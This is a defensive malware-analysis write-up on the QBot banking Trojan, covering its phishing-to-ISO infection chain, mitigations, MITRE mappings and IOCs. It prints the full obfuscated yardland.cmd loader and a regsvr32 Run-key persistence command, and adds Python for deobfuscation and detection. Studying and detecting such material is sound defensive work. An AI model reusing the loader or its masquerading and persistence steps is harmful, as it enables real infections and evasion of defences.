QBot, also known as Qakbot, QuackBot, and Pinkslipbot, is a banking Trojan that was first observed in 2007. Today, QBot remains a dangerous and persistent threat to organizations and has become one of the leading banking Trojans globally. In the past month we have observed an increase in attacks; the operators appear to be targeting organizations to collect valuable information which can then be replayed against partner organizations. Knowing key details, and often including a false email trail, makes the attack seem genuine.
To this day, QBot continues to grow and develop, adding capabilities and new techniques. Its main purpose is to steal banking data (banking credentials, online banking session information, the victim's personal details, etc.). However, its developers have also added functionality that allows QBot to spread itself, evade detection and debugging, and install additional malware on compromised machines, such as Cobalt Strike, REvil, ProLock, and Egregor ransomware.
The process used to obtain persistence has many layers of obfuscation, where known DLL files and/or trusted system executables are used to inject into processes in an attempt to hide from EDR/antivirus solutions.
QBot uses multiple attack vectors to infect victims. It is distributed through phishing emails containing malicious documents, attachments, or password-protected archives with the documents inside. Some versions of the malware have been observed being distributed by a dropper, such as Emotet.
For the CISO
Today, phishing emails present risks to most modern enterprises, and they continue to get more creative and advanced. We are currently seeing a rise in sophisticated phishing campaigns, often tailored to each enterprise. QBot malware is currently using DLL injection or DLL hijacking methods to exploit how Dynamic Link Libraries (DLLs) are loaded in Windows.
Adversaries may abuse rundll32.exe to proxy the execution of malicious code. Using rundll32.exe rather than executing a binary directly may help avoid detection, and the activity can hide in a sea of log data that is often overlooked by enterprise security teams.
Chain of Attack
- phishing email >> link or HTML attachment >> download ZIP >> unzip >> mount ISO image >> autorun LNK >> rundll32 process injection >> persistence
Security Controls for CISO
The attacks observed to date share a common theme: the emails come from spoofed domains or email addresses, and the bodies often contain company references and historical email threads. As CISOs we should ensure minimum baselines when considering email risks and external user authentication:
- Modern next-generation email protection (e.g. Proofpoint Email Protection)
- DKIM, DMARC, and SPF records
- SPF hard failure configured to drop inbound spoofed emails
- Backscatter (bounce message) filtering on O365
- MFA for email authentication
- User education and phishing training
Each phishing attack requires human intervention, so the human factor is the common weak link. Here is a short list of items identified and potential mitigation strategies:
- Block non-standard attachments
  - Consider limiting corporate email to Word documents, spreadsheets, PowerPoint and PDF, and ideally shift toward file-sharing services.
- User training
  - Staff should never interact with password-protected files without verbal or physical confirmation that the sender is known.
- GPO policy
  - Remove AutoRun for external drives and images, since this attachment leverages this Windows feature.
The last stage of the attack is where persistence and command and control are established. Visibility and mitigation are limited at this point; the horses have already left the barn. Regardless, it is very important to use best-of-breed tools to ensure maximum effectiveness:
- A next-generation EDR product such as CrowdStrike or Microsoft Defender
- DNS filtering
- A next-generation firewall (Fortinet / Palo Alto)
- A security operations and threat hunting team
However, the recon tools and tactics used after execution are very common and should be monitored:
- net use
- arp -a
- startup registry key creation
If left unchecked for long enough, ransomware gangs including Black Basta, Egregor, and ProLock use the malware to gain initial access to corporate networks and then proceed to exfiltrate data and encrypt it. I will continue to investigate the current QBot attacks and convert this into a blue team threat hunt.
- https://www.cisa.gov/sites/default/files/publications/202010221030_QakBot TLPWHITE.pd
- Masquerading – Mitre T1036 – renamed rundll32 executable was launched
- Software Packing – Mitre T1027.002 – packed executable was written to disk
- Process Injection – Mitre T1055 – rundll32 used to inject process
- Persistence – Mitre TA0003 – registry start key was added
- Process Injection – Mitre T1055
- Process Discovery – Mitre T1057
Indicators of Compromise
- muuopzfn.dll: MD5 c59c67fe5908c2cf67d2a7baf548d317, SHA256 0f0ee6558b84cbf678049bc076475122e93b1a0e07eef6bf1a4cd1daaf946f22, VirusTotal: https://www.virustotal.com/gui/file/0f0ee6558b84cbf678049bc076475122e93b1a0e07eef6bf1a4cd1daaf946f22
Command and Control
Discovery Commands
- whoami
- arp -a
- net use
- ipconfig /all
- netstat.exe
- route.exe
Detailed DFIR Investigation
After clicking on the HTML payload, a fake Adobe screen is presented, which triggers a zipped payload to be downloaded automatically. The file is a password-protected ZIP containing an ISO image set to autorun once mounted.
After unzipping the payload we double-click the ISO image, which results in the following command being executed:

```
C:\Windows\system32\cmd.exe /c E:\yardland.cmd
```

The yardland.cmd batch file contains the following. It builds the name of the system binary to copy (rundll32) and the name of the payload file (templates201.png) from fragments, using `%random%` comparisons whose "else" branches are decoys that almost never run:

```batch
SETLOCAL EnableDelayedExpansion
start unfeignedness_sitiophobia.png
set x3=run
set x2=dll
set x1=32
if %random% neq 100 (
  set tmp1=!x1!
  set x1=!x3!
  set x3=!tmp1!
) else (
  set tmp1=!x2!
  set x1=!x1!
  set x2=!tmp1!
)
set exe2=templ
set exe1=ates201.png
if %random% neq 200 (
  set tmp2=!exe1!
  set exe1=!exe2!
  set exe2=!tmp2!
) else (
  set tmp2=!x1!
  set exe1=!tmp2!
  set exe2=!x2!
)
if %random% neq 300 (
  set xxx=#1
) else (
  set xxx=unfeignedness_sitiophobia.png
)
echo f|xcopy %SystemRoot%\system32\%x1%%x2%%x3%.exe %temp%\companionably.exe /h /s /e
set t3=%temp%\%random%.%random%
echo f|xcopy !exe1!!exe2! %t3% /h /s /e
%temp%\companionably.exe %t3%,%xxx%
```
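As an added illustration (not part of the original write-up and not the loader itself), the following Python replays the variable swaps in yardland.cmd for each combination of the three `%random%` tests, showing which branches reproduce the xcopy commands seen in the process tree and how unlikely the decoy branches are; the `%temp%` placeholder and the 2694.7172 staging name are taken from the observed commands.

```python
from itertools import product

# cmd.exe's %random% ranges over 0..32767, so each "if %random% neq N" test
# is true on all but one value. Each test draws a fresh %random%.
P_HIT = 1 / 32768

def resolve_loader(r100_hit, r200_hit, r300_hit, temp="%temp%", t3="2694.7172"):
    """Replay one path; each r*_hit flag says whether that %random% test equalled N."""
    x3, x2, x1 = "run", "dll", "32"
    if not r100_hit:                 # neq 100: swap x1/x3 -> "run" "dll" "32"
        x1, x3 = x3, x1
    # the else branch swaps x2 with itself, leaving the decoy "32dllrun"
    exe2, exe1 = "templ", "ates201.png"
    if not r200_hit:                 # neq 200: swap -> "templ" + "ates201.png"
        exe1, exe2 = exe2, exe1
    else:                            # decoy: payload name becomes x1 + x2
        exe1, exe2 = x1, x2
    export = "#1" if not r300_hit else "unfeignedness_sitiophobia.png"
    lolbin = f"{x1}{x2}{x3}.exe"
    renamed, staged = f"{temp}\\companionably.exe", f"{temp}\\{t3}"
    return {
        "lolbin": lolbin, "payload": exe1 + exe2, "export": export,
        "commands": [
            f"xcopy %SystemRoot%\\system32\\{lolbin} {renamed} /h /s /e",
            f"xcopy {exe1}{exe2} {staged} /h /s /e",
            f"{renamed} {staged},{export}",   # renamed rundll32 loads the staged DLL
        ],
    }

def effective_paths():
    """All eight branch combinations with their probability and whether they
    reproduce the xcopy commands observed in the process tree."""
    out = []
    for hits in product([False, True], repeat=3):
        r = resolve_loader(*hits)
        prob = 1.0
        for hit in hits:
            prob *= P_HIT if hit else 1 - P_HIT
        observed = r["lolbin"] == "rundll32.exe" and r["payload"] == "templates201.png"
        out.append((hits, prob, observed))
    return out

if __name__ == "__main__":
    for hits, prob, observed in effective_paths():
        label = "observed" if observed else "decoy"
        print(hits, f"{prob:.6f}", label, resolve_loader(*hits)["commands"][-1])
```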
The following process tree illustrates the parent-child process relationships and each command spawned from the yardland.cmd execution.
Masquerading – Mitre T1036
A renamed rundll32 executable was launched. Adversaries can rename files to evade detection. Review the command line and process tree.

```
xcopy C:\Windows\system32\rundll32.exe C:\Users\admin\AppData\Local\Temp\companionably.exe /h /s /e
```
Software Packing – Mitre T1027.002
A packed executable was written to disk. If this is unexpected, it might indicate suspicious activity. Review the process tree and related file-written events.

```
xcopy templates201.png C:\Users\admin\AppData\Local\Temp\2694.7172 /h /s /e
```
Process Injection – Mitre T1055
rundll32 was used to inject into another process: a likely malicious process injected code into another process in a suspicious way.
Persistence (Registry Key Added) – Mitre TA0003
A process made a suspicious change to the registry that may be indicative of a malicious persistence mechanism.
“C:\Windows\SysWOW64\CertEnrollCtrl.exe” was used to write the DLL “AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll”, which was then registered under the user's Run key:

```
regsvr32.exe "C:\Users\admin\AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll" \REGISTRY\USER\S-1-5-21-X-X-X-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```
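As an added example (not from the original post), the following Python hunt runs the indicators walked through above (the rundll32 copy and its renamed launch, wermgr.exe spawned from the temp binary, regsvr32 registering a DLL out of AppData\Roaming, and the burst of discovery commands listed earlier) over a handful of constructed process-creation events; the pids, timestamps and the parent/child links between the events are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed process-creation events (t in seconds, pid, ppid, image, command line)
# modelled on the command lines in the write-up; pids, times and parent links are invented.
EVENTS = [
    (0, 100, 50, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c E:\yardland.cmd"),
    (1, 101, 100, r"C:\Windows\System32\xcopy.exe",
     r"xcopy C:\Windows\system32\rundll32.exe C:\Users\admin\AppData\Local\Temp\companionably.exe /h /s /e"),
    (2, 102, 100, r"C:\Users\admin\AppData\Local\Temp\companionably.exe",
     r"C:\Users\admin\AppData\Local\Temp\companionably.exe C:\Users\admin\AppData\Local\Temp\2694.7172,#1"),
    (3, 103, 102, r"C:\Windows\SysWOW64\wermgr.exe", "wermgr.exe"),
    (4, 104, 103, r"C:\Windows\SysWOW64\regsvr32.exe",
     r'regsvr32.exe "C:\Users\admin\AppData\Roaming\Microsoft\Pnkelie\muuopzfn.dll"'),
    (5, 105, 103, r"C:\Windows\System32\whoami.exe", "whoami"),
    (6, 106, 103, r"C:\Windows\System32\ARP.EXE", "arp -a"),
    (7, 107, 103, r"C:\Windows\System32\net.exe", "net use"),
    (8, 108, 103, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    (9, 109, 60, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),  # lone admin command
]
RECON = {"whoami.exe", "arp.exe", "net.exe", "ipconfig.exe", "netstat.exe", "route.exe"}
LOLBIN_COPY = re.compile(r"\\system32\\(rundll32|regsvr32|mshta)\.exe\s+(\S+)", re.I)
EXPORT_ARG = re.compile(r"\S+,(#\d+|\w+)$")   # rundll32 calling convention "<dll>,<export>"

def base(path):
    return path.rsplit("\\", 1)[-1].lower()

def hunt(events, window=60, min_recon=3):
    """Return (technique, pid, detail) hits for the chain described in the write-up."""
    hits, image_of = [], {pid: img.lower() for _, pid, _, img, _ in events}
    recon = defaultdict(list)                       # parent pid -> [(t, discovery tool)]
    for t, pid, ppid, image, cmd in events:
        name, parent = base(image), image_of.get(ppid, "")
        copy = LOLBIN_COPY.search(cmd)
        if name in ("xcopy.exe", "cmd.exe") and copy and base(copy.group(2)) != copy.group(1).lower() + ".exe":
            hits.append(("T1036", pid, f"{copy.group(1)}.exe copied to {copy.group(2)}"))
        if name != "rundll32.exe" and EXPORT_ARG.search(cmd):
            hits.append(("T1036", pid, f"{name} launched with a rundll32-style argument"))
        if name == "wermgr.exe" and (base(parent) == "rundll32.exe" or "\\appdata\\" in parent):
            hits.append(("T1055", pid, f"wermgr.exe spawned by {parent}"))
        if name == "regsvr32.exe" and "\\appdata\\roaming\\" in cmd.lower():
            hits.append(("TA0003", pid, "regsvr32 registering a DLL from AppData\\Roaming"))
        if name in RECON:   # several distinct discovery tools from one parent inside the window
            recon[ppid] = [(ts, c) for ts, c in recon[ppid] if t - ts <= window] + [(t, name)]
            if len({c for _, c in recon[ppid]}) == min_recon:   # fire once per parent
                hits.append(("Discovery", ppid, f"{min_recon}+ discovery commands within {window}s"))
    return hits

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(*hit)
```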
Investigation of “muuopzfn.dll”
- Process Injection – Mitre T1055
- Process Discovery – Mitre T1057
| Behaviour | Severity | Detail |
|---|---|---|
| Behavioural detection: injection (process hollowing) | High | Injection: rundll32.exe (2792) -> wermgr.exe (1516) |
| Executed a process and injected code into it, probably while unpacking | High | Injection: rundll32.exe (2792) -> wermgr.exe (1516) |
| Accessed the Netlogon registry key, potentially used for discovery or tampering | Medium | regkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters |
| Enumerates running processes | Medium | process: System (pid 4), smss.exe (pid 268), csrss.exe (pid 356), wininit.exe (pid 392), csrss.exe (pid 400), winlogon.exe (pid 428), services.exe (pid 488), lsass.exe (pid 496), lsm.exe (pid 504), svchost.exe (pid 604) …. |